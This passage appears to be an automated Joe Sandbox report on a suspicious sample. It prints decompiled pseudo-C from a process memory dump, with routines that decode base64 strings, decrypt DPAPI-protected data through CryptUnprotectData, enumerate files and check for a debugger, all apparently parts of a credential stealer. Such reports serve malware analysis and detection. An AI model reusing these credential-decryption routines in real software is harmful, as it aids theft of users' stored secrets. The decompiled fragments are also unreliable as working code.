                                                                    																						goto L48;
                                                                    																					}
                                                                    																					_t208 = _t301 + 0x18;
                                                                    																					 *_t208 =  *(_t301 + 0x18) + 0x10;
                                                                    																					__eflags =  *_t208;
                                                                    																					_v1180 = _v1140;
                                                                    																					L92:
                                                                    																					_t226 =  *(_t301 + 0x14);
                                                                    																					__eflags =  *(_t301 + 0x14);
                                                                    																					if(__eflags != 0) {
                                                                    																						goto L100;
                                                                    																					}
                                                                    																					_t373 = E0041E24D(_t301, _t341, _t356, _t363, __eflags, _v1152);
                                                                    																					E00420090(_t373, _v864, _v1152);
                                                                    																					_v864 = _t373;
                                                                    																					_t273 = E0041E24D(_t301, _t341, _t356, _t373, __eflags, 0x360);
                                                                    																					_t363 =  &_v1184;
                                                                    																					_t274 = memcpy(_t273, _t363, 0xd8 << 2);
                                                                    																					_t356 = _t363 + 0x1b0;
                                                                    																					_t341 =  *(_t301 + 0x44);
                                                                    																					__eflags = _t341;
                                                                    																					if(_t341 != 0) {
                                                                    																						while(1) {
                                                                    																							_t220 = _t341 + 0x35c; // 0x360
                                                                    																							_t337 = _t220;
                                                                    																							__eflags =  *_t337;
                                                                    																							if( *_t337 == 0) {
                                                                    																								break;
                                                                    																							}
                                                                    																							_t341 =  *_t337;
                                                                    																						}
                                                                    																						 *(_t341 + 0x35c) = _t274;
                                                                    																						L98:
                                                                    																						_t226 = 0;
                                                                    																						goto L100;
                                                                    																					}
                                                                    																					 *(_t301 + 0x44) = _t274;
                                                                    																					goto L98;
                                                                    																				}
                                                                    																				__eflags = _t332;
                                                                    																				if(_t332 == 0) {
                                                                    																					goto L87;
                                                                    																				}
                                                                    																				goto L90;
                                                                    																			}
                                                                    																			L87:
                                                                    																			_t226 = 0x4000000;
                                                                    																			goto L100;
                                                                    																		}
                                                                    																		__eflags =  *_t301;
                                                                    																		if( *_t301 == 0) {
                                                                    																			L79:
                                                                    																			__eflags = _v1180 & 0x00000001;
                                                                    																			_v1178 = _t356;
                                                                    																			if((_v1180 & 0x00000001) == 0) {
                                                                    																				_t197 =  &_v1180;
                                                                    																				 *_t197 = _v1180 & 0x0000fff7;
                                                                    																				__eflags =  *_t197;
                                                                    																			}
                                                                    																			_t363 = _v1132 -  *((intOrPtr*)(_t301 + 0x10));
                                                                    																			_v1140 = _v1180;
                                                                    																			_t277 = E0041C0F8(_t301, _v1132 -  *((intOrPtr*)(_t301 + 0x10)));
                                                                    																			__eflags = _t277;
                                                                    																			if(_t277 != 0) {
                                                                    																				_t356 = _t301;
                                                                    																				_t363 =  &_v1184;
                                                                    																				_t278 = E0041B274(_t301, _t332, _t301,  &_v1184);
                                                                    																				__eflags = _t278;
                                                                    																				if(_t278 != 0) {
                                                                    																					goto L48;
                                                                    																				}
                                                                    																				_t363 =  *(_t301 + 0x18);
                                                                    																				_t280 = E0041C0F8(_t301,  *(_t301 + 0x18));
                                                                    																				__eflags = _t280;
                                                                    																				if(_t280 != 0) {
                                                                    																					goto L92;
                                                                    																				}
                                                                    																				goto L82;
                                                                    																			} else {
                                                                    																				L82:
                                                                    																				_t226 = 0x2000000;
                                                                    																				goto L100;
                                                                    																			}
                                                                    																		}
                                                                    																		__eflags = _v1185;
                                                                    																		if(_v1185 == 0) {
                                                                    																			goto L86;
                                                                    																		}
                                                                    																		goto L79;
                                                                    																	}
                                                                    																	__eflags = _t356 - 8;
                                                                    																	if(_t356 != 8) {
                                                                    																		__eflags = _t356;
                                                                    																		if(__eflags != 0) {
                                                                    																			goto L74;
                                                                    																		}
                                                                    																		_t283 = E0041C686(_t301, _t330, __eflags);
                                                                    																		L72:
                                                                    																		_v1192 = _t283;
                                                                    																		goto L74;
                                                                    																	}
                                                                    																	_t283 = E0041C581(_t301,  &_v1184);
                                                                    																	goto L72;
                                                                    																}
                                                                    															} else {
                                                                    																goto L52;
                                                                    															}
                                                                    															while(1) {
                                                                    																L52:
                                                                    																_t341 =  *_t369;
                                                                    																__eflags =  *_t369;
                                                                    																if( *_t369 == 0) {
                                                                    																	goto L54;
                                                                    																}
                                                                    																E0041BC10(_t328);
                                                                    																_t369 = _t369 + 1;
                                                                    																__eflags = _t369;
                                                                    																if(_t369 != 0) {
                                                                    																	continue;
                                                                    																}
                                                                    																goto L54;
                                                                    															}
                                                                    															goto L54;
                                                                    														}
                                                                    														_t363 = _t301;
                                                                    														E0041C540(_t301);
                                                                    														_t226 =  *(_t301 + 0x14);
                                                                    														goto L100;
                                                                    													}
                                                                    													_t363 = _t301;
                                                                    													E0041C540(_t301);
                                                                    													goto L48;
                                                                    												}
                                                                    											}
                                                                    											_t362 =  &_v856 - 1;
                                                                    											__eflags = _t362;
                                                                    											do {
                                                                    												_t297 =  *(_t362 + 1);
                                                                    												_t362 = _t362 + 1;
                                                                    												__eflags = _t297;
                                                                    											} while (_t297 != 0);
                                                                    											asm("movsw");
                                                                    											_t45 =  &_v1160;
                                                                    											 *_t45 = _v1160 + 1;
                                                                    											__eflags =  *_t45;
                                                                    											goto L39;
                                                                    										}
                                                                    										_t341 = _v1192;
                                                                    										_t226 = E0041C33E(_t301, _a8, _v1192);
                                                                    										goto L30;
                                                                    									}
                                                                    									_t226 = E0041C21B(_t301, _v1192, _a8);
                                                                    									goto L30;
                                                                    								}
                                                                    								_t363 = _t301;
                                                                    								_t226 = E0041C1A0(_t301, _v1192);
                                                                    								goto L30;
                                                                    							}
                                                                    							_t356 =  &_v320;
                                                                    							_t298 = E0041BC80( &_v320);
                                                                    							__eflags = _t298;
                                                                    							if(_t298 == 0) {
                                                                    								goto L22;
                                                                    							}
                                                                    							goto L21;
                                                                    						}
                                                                    						_t299 =  &_v320;
                                                                    						_t341 = _t299 + 1;
                                                                    						do {
                                                                    							_t340 =  *_t299;
                                                                    							_t299 = _t299 + 1;
                                                                    							__eflags = _t340;
                                                                    						} while (_t340 != 0);
                                                                    						_t300 = _t299 - _t341;
                                                                    						__eflags =  *((char*)(_t379 + _t300 - 0x13d)) - 0x2f;
                                                                    						_v1186 = 1;
                                                                    						if( *((char*)(_t379 + _t300 - 0x13d)) != 0x2f) {
                                                                    							goto L19;
                                                                    						}
                                                                    						goto L18;
                                                                    					} else {
                                                                    						_t226 = 0x50000;
                                                                    						goto L100;
                                                                    					}
                                                                    				} else {
                                                                    					_t226 = 0x40000;
                                                                    					L100:
                                                                    					return E0041DA9B(_t226, _t301, _v12 ^ _t379, _t341, _t356, _t363);
                                                                    				}
                                                                    			}










































































































                                                                    0x0041cb6c
                                                                    0x00000000
                                                                    0x0041cb6c
                                                                    0x0041cb5a
                                                                    0x00000000
                                                                    0x0041cb5a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041ca97
                                                                    0x0041ca97
                                                                    0x0041ca97
                                                                    0x0041ca99
                                                                    0x0041ca9b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041ca9d
                                                                    0x0041caa2
                                                                    0x0041caa2
                                                                    0x0041caa3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041caa3
                                                                    0x00000000
                                                                    0x0041ca97
                                                                    0x0041ca6b
                                                                    0x0041ca6d
                                                                    0x0041ca72
                                                                    0x00000000
                                                                    0x0041ca72
                                                                    0x0041ca41
                                                                    0x0041ca43
                                                                    0x00000000
                                                                    0x0041ca43
                                                                    0x0041c916
                                                                    0x0041c86e
                                                                    0x0041c86e
                                                                    0x0041c86f
                                                                    0x0041c86f
                                                                    0x0041c872
                                                                    0x0041c873
                                                                    0x0041c873
                                                                    0x0041c87c
                                                                    0x0041c87e
                                                                    0x0041c87e
                                                                    0x0041c87e
                                                                    0x00000000
                                                                    0x0041c87e
                                                                    0x0041c806
                                                                    0x0041c80c
                                                                    0x00000000
                                                                    0x0041c80c
                                                                    0x0041c7f7
                                                                    0x00000000
                                                                    0x0041c7f7
                                                                    0x0041c7e0
                                                                    0x0041c7e2
                                                                    0x00000000
                                                                    0x0041c7e2
                                                                    0x0041c7bd
                                                                    0x0041c7c3
                                                                    0x0041c7c8
                                                                    0x0041c7ca
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041c7ca
                                                                    0x0041c780
                                                                    0x0041c786
                                                                    0x0041c789
                                                                    0x0041c789
                                                                    0x0041c78b
                                                                    0x0041c78c
                                                                    0x0041c78c
                                                                    0x0041c790
                                                                    0x0041c792
                                                                    0x0041c79a
                                                                    0x0041c7a1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041c716
                                                                    0x0041c716
                                                                    0x00000000
                                                                    0x0041c716
                                                                    0x0041c706
                                                                    0x0041c706
                                                                    0x0041cd03
                                                                    0x0041cd11
                                                                    0x0041cd11

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: /$UT
                                                                    • API String ID: 0-1626504983
                                                                    • Opcode ID: 1580c0a324d329e5f01ca90be48cd768f3d3da79c5a9ab48edff02e46c69d75c
                                                                    • Instruction ID: a887f3ce2049bf9975ac98b2df1c0d5ee50926fc17ebe0ce4a4d346fba0e3955
                                                                    • Opcode Fuzzy Hash: 1580c0a324d329e5f01ca90be48cd768f3d3da79c5a9ab48edff02e46c69d75c
                                                                    • Instruction Fuzzy Hash: 84027D709442698BDF21CF28DC803EEBBB1AF55304F1444EAD949AB242D7789EC5CF99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0040E42C
                                                                    • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,?,0040FA4D,?,?,0043C8D8), ref: 0040E441
                                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0040E449
                                                                    • _memmove.LIBCMT ref: 0040E4A3
                                                                    • lstrcatA.KERNEL32(0043C8D8,0043C8D8,?,00000000,00000000,00000000,?,0040FA4D,?,?,0043C8D8), ref: 0040E4B9
                                                                    • lstrcatA.KERNEL32(0043C8D8,0043C8D8,?,00000000,?,00000001,?,?,00000000,00000000,00000000,?,0040FA4D,?,?,0043C8D8), ref: 0040E4CB
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$BinaryCryptString_memmove_memsetlstrlen
                                                                    • String ID:
                                                                    • API String ID: 943939369-0
                                                                    • Opcode ID: a8cad6c8e4c14ceda9a507e367f9aa5b572d9d70c5cba7095773e717734efe9c
                                                                    • Instruction ID: d1e8293adbde57431bfdfa0b3896d8325c53172deab819d65320c261a2c2aaf8
                                                                    • Opcode Fuzzy Hash: a8cad6c8e4c14ceda9a507e367f9aa5b572d9d70c5cba7095773e717734efe9c
                                                                    • Instruction Fuzzy Hash: 3931FC75900219AFDB109FA59C889EEBBBCFF0A354F15043AF909E7241EB3499048B69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 32%
                                                                    			E00415890(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int __fp0) {
                                                                    				void* _t30;
                                                                    				void* _t36;
                                                                    				void* _t38;
                                                                    				void* _t43;
                                                                    				signed int* _t44;
                                                                    				void* _t46;
                                                                    
                                                                    				_t46 = __eflags;
                                                                    				_t38 = __edx;
                                                                    				_t36 = __ecx;
                                                                    				E0042083E(E00434621, __ebx, __edi, __esi);
                                                                    				 *(_t43 - 0x108) =  *(_t43 - 0x108) & 0x00000000;
                                                                    				 *(_t43 - 0x24) = 0;
                                                                    				asm("stosd");
                                                                    				asm("stosd");
                                                                    				asm("stosd");
                                                                    				asm("stosw");
                                                                    				GetSystemTime(_t43 - 0x24);
                                                                    				GetTimeZoneInformation(_t43 - 0x104);
                                                                    				 *((short*)(_t43 - 0x34)) = 0;
                                                                    				asm("stosd");
                                                                    				asm("stosd");
                                                                    				asm("stosd");
                                                                    				asm("stosw");
                                                                    				 *0x4464d8(_t43 - 0x104, _t43 - 0x24, _t43 - 0x34, 0xfc);
                                                                    				_push(_t36);
                                                                    				asm("fild dword [ebp-0x104]");
                                                                    				asm("fchs");
                                                                    				 *(_t43 - 0x108) = __fp0 /  *0x43f728;
                                                                    				 *_t44 =  *(_t43 - 0x108);
                                                                    				_push(_t43 - 0x50);
                                                                    				_t30 = E0041615D(__ebx, _t38, _t43 - 0x32, __esi, _t46);
                                                                    				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
                                                                    				E00404697(_t36, __esi, "UTC", _t30);
                                                                    				E00404354(_t43 - 0x50, 1, 0);
                                                                    				return E00420888(__ebx, _t43 - 0x32, __esi);
                                                                    			}










                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 0041589A
                                                                    • GetSystemTime.KERNEL32(?), ref: 004158B8
                                                                    • GetTimeZoneInformation.KERNEL32(?), ref: 004158C5
                                                                    • TzSpecificLocalTimeToSystemTime.KERNEL32(?,?,?), ref: 004158E8
                                                                      • Part of subcall function 0041615D: __EH_prolog3.LIBCMT ref: 00416167
                                                                      • Part of subcall function 0041615D: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00416208
                                                                      • Part of subcall function 00404354: _memmove.LIBCMT ref: 00404373
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Time$System$H_prolog3H_prolog3_InformationIos_base_dtorLocalSpecificZone_memmovestd::ios_base::_
                                                                    • String ID: UTC
                                                                    • API String ID: 2104780860-2754919731
                                                                    • Opcode ID: 8744bb6a9babb2631268157343bc8588b84851c1a6e1c846dec4e50bd8b1d93f
                                                                    • Instruction ID: 43c0975b4facea423fcd3bb8f92bd3f32dbffd23a130000cfe697fc8daaff8d2
                                                                    • Opcode Fuzzy Hash: 8744bb6a9babb2631268157343bc8588b84851c1a6e1c846dec4e50bd8b1d93f
                                                                    • Instruction Fuzzy Hash: F7117C71D00118FFDB40EBE4DD45BCEB7B8AF59305F1004A6E244F2051DBB89E988B5A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0042A969(void* __edi, char* __esi) {
                                                                    				short _v8;
                                                                    				void* _t24;
                                                                    
                                                                    				_t24 = __edi;
                                                                    				if(__esi == 0 ||  *__esi == 0 || E004252B0(__esi, ?str?) == 0) {
                                                                    					if(GetLocaleInfoW( *(_t24 + 0x1c), 0x20001004,  &_v8, 2) != 0) {
                                                                    						if(_v8 != 0) {
                                                                    							goto L5;
                                                                    						} else {
                                                                    							return GetACP();
                                                                    						}
                                                                    					} else {
                                                                    						goto L8;
                                                                    					}
                                                                    				} else {
                                                                    					if(E004252B0(__esi, ?str?) != 0) {
                                                                    						_v8 = E0041EA0D(__esi);
                                                                    						goto L5;
                                                                    					} else {
                                                                    						if(GetLocaleInfoW( *(__edi + 0x1c), 0x2000000b,  &_v8, 2) == 0) {
                                                                    							L8:
                                                                    							return 0;
                                                                    						} else {
                                                                    							L5:
                                                                    							return _v8;
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    			}






                                                                    APIs
                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,0042AFA6,?,00420E8A,?,000000BC,?,00000001,00000000,00000000), ref: 0042A9A8
                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,0042AFA6,?,00420E8A,?,000000BC,?,00000001,00000000,00000000), ref: 0042A9D1
                                                                    • GetACP.KERNEL32(?,?,0042AFA6,?,00420E8A,?,000000BC,?,00000001,00000000), ref: 0042A9E5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID: ACP$OCP
                                                                    • API String ID: 2299586839-711371036
                                                                    • Opcode ID: a8ffcdeed41c69b855cf39dbf5a919eb22e713f5debcebad4af82cf12c594d71
                                                                    • Instruction ID: febc8eaa90a09055e3a7e711ae5ad2748a80d9b1ff6c8135008803a5b45ae77b
                                                                    • Opcode Fuzzy Hash: a8ffcdeed41c69b855cf39dbf5a919eb22e713f5debcebad4af82cf12c594d71
                                                                    • Instruction Fuzzy Hash: 8601B9B1705A16BBDB119762BC06F5F72A9AF05318F600857E901D01C0DB68DFD1965E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 85%
                                                                    			E0041DA9B(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                    				intOrPtr _v0;
                                                                    				void* _v804;
                                                                    				intOrPtr _v808;
                                                                    				intOrPtr _v812;
                                                                    				intOrPtr _t6;
                                                                    				intOrPtr _t11;
                                                                    				intOrPtr _t12;
                                                                    				intOrPtr _t13;
                                                                    				long _t17;
                                                                    				intOrPtr _t21;
                                                                    				intOrPtr _t22;
                                                                    				intOrPtr _t25;
                                                                    				intOrPtr _t26;
                                                                    				intOrPtr _t27;
                                                                    				intOrPtr* _t31;
                                                                    				void* _t34;
                                                                    
                                                                    				_t27 = __esi;
                                                                    				_t26 = __edi;
                                                                    				_t25 = __edx;
                                                                    				_t22 = __ecx;
                                                                    				_t21 = __ebx;
                                                                    				_t6 = __eax;
                                                                    				_t34 = _t22 -  *0x443674; // 0x393162b1
                                                                    				if(_t34 == 0) {
                                                                    					asm("repe ret");
                                                                    				}
                                                                    				 *0x444e08 = _t6;
                                                                    				 *0x444e04 = _t22;
                                                                    				 *0x444e00 = _t25;
                                                                    				 *0x444dfc = _t21;
                                                                    				 *0x444df8 = _t27;
                                                                    				 *0x444df4 = _t26;
                                                                    				 *0x444e20 = ss;
                                                                    				 *0x444e14 = cs;
                                                                    				 *0x444df0 = ds;
                                                                    				 *0x444dec = es;
                                                                    				 *0x444de8 = fs;
                                                                    				 *0x444de4 = gs;
                                                                    				asm("pushfd");
                                                                    				_pop( *0x444e18);
                                                                    				 *0x444e0c =  *_t31;
                                                                    				 *0x444e10 = _v0;
                                                                    				 *0x444e1c =  &_a4;
                                                                    				 *0x444d58 = 0x10001;
                                                                    				_t11 =  *0x444e10; // 0x0
                                                                    				 *0x444d0c = _t11;
                                                                    				 *0x444d00 = 0xc0000409;
                                                                    				 *0x444d04 = 1;
                                                                    				_t12 =  *0x443674; // 0x393162b1
                                                                    				_v812 = _t12;
                                                                    				_t13 =  *0x443678; // 0xc6ce9d4e
                                                                    				_v808 = _t13;
                                                                    				 *0x444d50 = IsDebuggerPresent();
                                                                    				_push(1);
                                                                    				E0042D3F5(_t14);
                                                                    				SetUnhandledExceptionFilter(0);
                                                                    				_t17 = UnhandledExceptionFilter(0x435d70);
                                                                    				if( *0x444d50 == 0) {
                                                                    					_push(1);
                                                                    					E0042D3F5(_t17);
                                                                    				}
                                                                    				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                    			}




















                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32 ref: 00423071
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423086
                                                                    • UnhandledExceptionFilter.KERNEL32(00435D70), ref: 00423091
                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 004230AD
                                                                    • TerminateProcess.KERNEL32(00000000), ref: 004230B4
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                    • String ID:
                                                                    • API String ID: 2579439406-0
                                                                    • Opcode ID: 5c628fe7a839dc3cde5843dce2d8718577464646037a970df2fc8381dab1a578
                                                                    • Instruction ID: 214c0d62a537c9700224adae85c1850bcd2d42f3721d8878eabfc0ec3ff5be95
                                                                    • Opcode Fuzzy Hash: 5c628fe7a839dc3cde5843dce2d8718577464646037a970df2fc8381dab1a578
                                                                    • Instruction Fuzzy Hash: CC212DBC900600EFD314DF68FD49B443BB0BB8A306F61403AE91887360E7B54A818F9D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 31%
                                                                    			E0040E80D(char __eax, intOrPtr __ecx, void* __eflags) {
                                                                    				intOrPtr _v8;
                                                                    				char _v12;
                                                                    				intOrPtr _v16;
                                                                    				char _v20;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* _t20;
                                                                    				intOrPtr _t21;
                                                                    				intOrPtr _t22;
                                                                    				char _t23;
                                                                    				void* _t24;
                                                                    
                                                                    				_t23 = __eax;
                                                                    				_t21 = __ecx;
                                                                    				E00420090(E0041DAE4(_t20, __ecx, __eax, __eax), _t21, _t23);
                                                                    				_v8 = _t21;
                                                                    				_v12 = _t23;
                                                                    				_t24 = E0041DAE4(_t20, _t21, _t23, _t23);
                                                                    				_push( &_v20);
                                                                    				_push(0);
                                                                    				_push(0);
                                                                    				_push(0);
                                                                    				_push(0);
                                                                    				_push(0);
                                                                    				_push( &_v12);
                                                                    				if( *0x446330() == 0) {
                                                                    					return 0;
                                                                    				}
                                                                    				_t22 = _v20;
                                                                    				if(_t22 > 0) {
                                                                    					E00420090(_t24, _v16, _t22);
                                                                    				}
                                                                    				 *((char*)(_t22 + _t24)) = 0;
                                                                    				return _t24;
                                                                    			}















                                                                    APIs
                                                                    • _malloc.LIBCMT ref: 0040E81B
                                                                      • Part of subcall function 0041DAE4: __FF_MSGBANNER.LIBCMT ref: 0041DAFD
                                                                      • Part of subcall function 0041DAE4: __NMSG_WRITE.LIBCMT ref: 0041DB04
                                                                      • Part of subcall function 0041DAE4: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,00403F3E,00000010), ref: 0041DB29
                                                                    • _memmove.LIBCMT ref: 0040E823
                                                                    • _malloc.LIBCMT ref: 0040E82F
                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040E848
                                                                    • _memmove.LIBCMT ref: 0040E85E
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _malloc_memmove$AllocateCryptDataHeapUnprotect
                                                                    • String ID:
                                                                    • API String ID: 2315474888-0
                                                                    • Opcode ID: b8b378b900a93f00d87ce76ceb73221065714ee5fe5af70d6800e80a949424ac
                                                                    • Instruction ID: 0b2d1560495a64abfde54cc84344305bbe744bb266e7e4d9481ecb72b86ac225
                                                                    • Opcode Fuzzy Hash: b8b378b900a93f00d87ce76ceb73221065714ee5fe5af70d6800e80a949424ac
                                                                    • Instruction Fuzzy Hash: 77F0C273E00128BBCB10BBFB5C45DEFBBAC9D81654B04087BF500E3242E674DA1082B9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 68%
                                                                    			E0040E5CE(intOrPtr __eax, long* __edi, char _a4, void** _a8) {
                                                                    				void* _v8;
                                                                    				long _v12;
                                                                    				intOrPtr _v16;
                                                                    				char _v20;
                                                                    				long _t19;
                                                                    				void* _t20;
                                                                    				void* _t22;
                                                                    
                                                                    				_v16 = __eax;
                                                                    				_v20 = _a4;
                                                                    				_t22 =  *0x446330( &_v20, 0, 0, 0, 0, 0,  &_v12);
                                                                    				if(_t22 != 0) {
                                                                    					_t19 = _v12;
                                                                    					 *__edi = _t19;
                                                                    					_t20 = LocalAlloc(0x40, _t19);
                                                                    					 *_a8 = _t20;
                                                                    					if(_t20 != 0) {
                                                                    						E00420090(_t20, _v8,  *__edi);
                                                                    					}
                                                                    				}
                                                                    				return LocalFree(_v8) & 0xffffff00 | _t22 != 0x00000000;
                                                                    			}











                                                                    APIs
                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040E5EE
                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 0040E602
                                                                    • _memmove.LIBCMT ref: 0040E617
                                                                    • LocalFree.KERNEL32(?), ref: 0040E622
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Local$AllocCryptDataFreeUnprotect_memmove
                                                                    • String ID:
                                                                    • API String ID: 3008826695-0
                                                                    • Opcode ID: f3cb171338736501db8c078a02f8cf8285bb8ecbce5ec10c647ce522f11ac20e
                                                                    • Instruction ID: 7eff8b3fd86d6f16b25c6b63ab63048266329acdc648202af58fd0e1868d6503
                                                                    • Opcode Fuzzy Hash: f3cb171338736501db8c078a02f8cf8285bb8ecbce5ec10c647ce522f11ac20e
                                                                    • Instruction Fuzzy Hash: FEF04475A00228BFCB01AFE4EC8989EBBBDFF09700F104861F901E7251E3765A508B94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0040E575(void** __ebx, void* __ecx, DWORD* __edi, char* _a4) {
                                                                    				int _v8;
                                                                    				BYTE* _t8;
                                                                    				int _t9;
                                                                    
                                                                    				 *__ebx = 0;
                                                                    				_v8 = 0;
                                                                    				 *__edi = 0;
                                                                    				if(CryptStringToBinaryA(_a4, 0, 1, 0, __edi, 0, 0) != 0) {
                                                                    					_t8 = LocalAlloc(0x40,  *__edi);
                                                                    					 *__ebx = _t8;
                                                                    					if(_t8 != 0) {
                                                                    						_t9 = CryptStringToBinaryA(_a4, 0, 1, _t8, __edi, 0, 0);
                                                                    						_v8 = _t9;
                                                                    						if(_t9 == 0) {
                                                                    							 *__ebx = LocalFree( *__ebx);
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				return _v8;
                                                                    			}







                                                                    APIs
                                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0040E58D
                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,0040E7A4,?,?,0043F08C,00000000,-0000001D), ref: 0040E59B
                                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0040E5B1
                                                                    • LocalFree.KERNEL32(?,?,?,0040E7A4,?,?,0043F08C,00000000,-0000001D), ref: 0040E5C0
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: BinaryCryptLocalString$AllocFree
                                                                    • String ID:
                                                                    • API String ID: 4291131564-0
                                                                    • Opcode ID: ff0dc26d5cbcba068beb9ba3c03915eaf9ef59ea057823bf18f8aecfdeb213ad
                                                                    • Instruction ID: 66b2da4d5c6768ab6512422875c7ae9f9d70ed189f119a13893a6080973c7255
                                                                    • Opcode Fuzzy Hash: ff0dc26d5cbcba068beb9ba3c03915eaf9ef59ea057823bf18f8aecfdeb213ad
                                                                    • Instruction Fuzzy Hash: 2AF03774511234BFDB215F52DC8CE8B7FA8EF07BA0F000461F809E6290E3B08A50DBA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 85%
                                                                    			E004162AB(intOrPtr* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                    				WCHAR* _t29;
                                                                    				intOrPtr* _t45;
                                                                    				void* _t63;
                                                                    
                                                                    				_t45 = __ebx;
                                                                    				_push(0x298);
                                                                    				E0042083E(E0043437D, __ebx, __edi, __esi);
                                                                    				 *(_t63 - 0x2a0) =  *(_t63 - 0x2a0) & 0x00000000;
                                                                    				 *((intOrPtr*)(_t63 - 0x2a4)) = __ebx;
                                                                    				 *((intOrPtr*)(_t63 - 4)) = 1;
                                                                    				_t29 = E004160E8(_t63 + 8, _t63 - 0x48);
                                                                    				_t65 = _t29[0xa] - 8;
                                                                    				if(_t29[0xa] >= 8) {
                                                                    					_t29 =  *_t29;
                                                                    				}
                                                                    				 *(_t63 - 0x29c) = FindFirstFileW(_t29, _t63 - 0x298);
                                                                    				E0040C148(0, _t63 - 0x48, 1);
                                                                    				 *_t45 = 0;
                                                                    				 *((intOrPtr*)(_t45 + 4)) = 0;
                                                                    				 *((intOrPtr*)(_t45 + 8)) = 0;
